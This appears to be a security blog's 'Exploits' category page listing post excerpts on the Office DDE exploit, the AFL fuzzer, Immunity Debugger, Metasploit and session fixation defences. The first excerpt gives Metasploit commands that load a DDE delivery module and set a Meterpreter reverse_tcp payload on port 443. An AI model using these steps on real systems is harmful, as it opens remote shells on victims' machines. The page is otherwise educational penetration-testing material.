Category: Exploits

All about Exploits!

Exploits, Office

Exploit Microsoft Office DDE Command Execution Vulnerability

Download module wget Move module into framework mv dde_delivery.rb /usr/share/metasploit-framework/modules/exploits/windows/mv dde_delivery.rb /usr/share/metasploit-framework/modules/exploits/windows/ Open Metasploit and load exploit msfconsole reload_all use exploit/windows/dde_deliverymsfconsole reload_all use exploit/windows/dde_delivery Set the sever host set SRVHOST SRVHOST Choose payload and run it set PAYLOAD windows/meterpreter/reverse_tcp set LHOST set LPORT 443 exploitset PAYLOAD windows/meterpreter/reverse_tcp set LHOST …

Exploits, Fuzzing

Security oriented open source fuzzer

American fuzzy lop is a security-oriented fuzzer that employs a novel type of compile-time instrumentation and genetic algorithms to automatically discover clean, interesting test cases that trigger new internal states in the targeted binary. This substantially improves the functional coverage for the fuzzed code. The compact synthesized corpora produced by the tool are also useful …

Exploits, Malware Analysis, Reverse Engineering

Write exploits, analyze malware, and reverse engineer binary files

Immunity Debugger is a powerful new way to write exploits, analyze malware, and reverse engineer binary files. It builds on a solid user interface with function graphing, the industry’s first heap analysis tool built specifically for heap creation, and a large and well supported Python API for easy extensibility. Overview A debugger with functionality designed …

Exploits, Metasploit

Metasploit – Introduction – Part 1

Metasploit is an entire framework that provides the necessary tools, during¬† a penetration test, to identify flaws and run various exploits against a remote target machine.¬† Simplifies network discovery and vulnerability verification, increasing the probability of success for your project. It is one of the most popular tools in the field of information security and …

Exploits, Vulnerabilities

Preventing Session fixation – hijacking

“Session fixation attacks attempt to exploit the vulnerability of a system which allows one person to fixate (set) another person’s session identifier (SID). Most session fixation attacks are web based, and most rely on session identifiers being accepted from URLs (query string) or POST data..” from Wiki. Let’s see some countermeasures we can take to …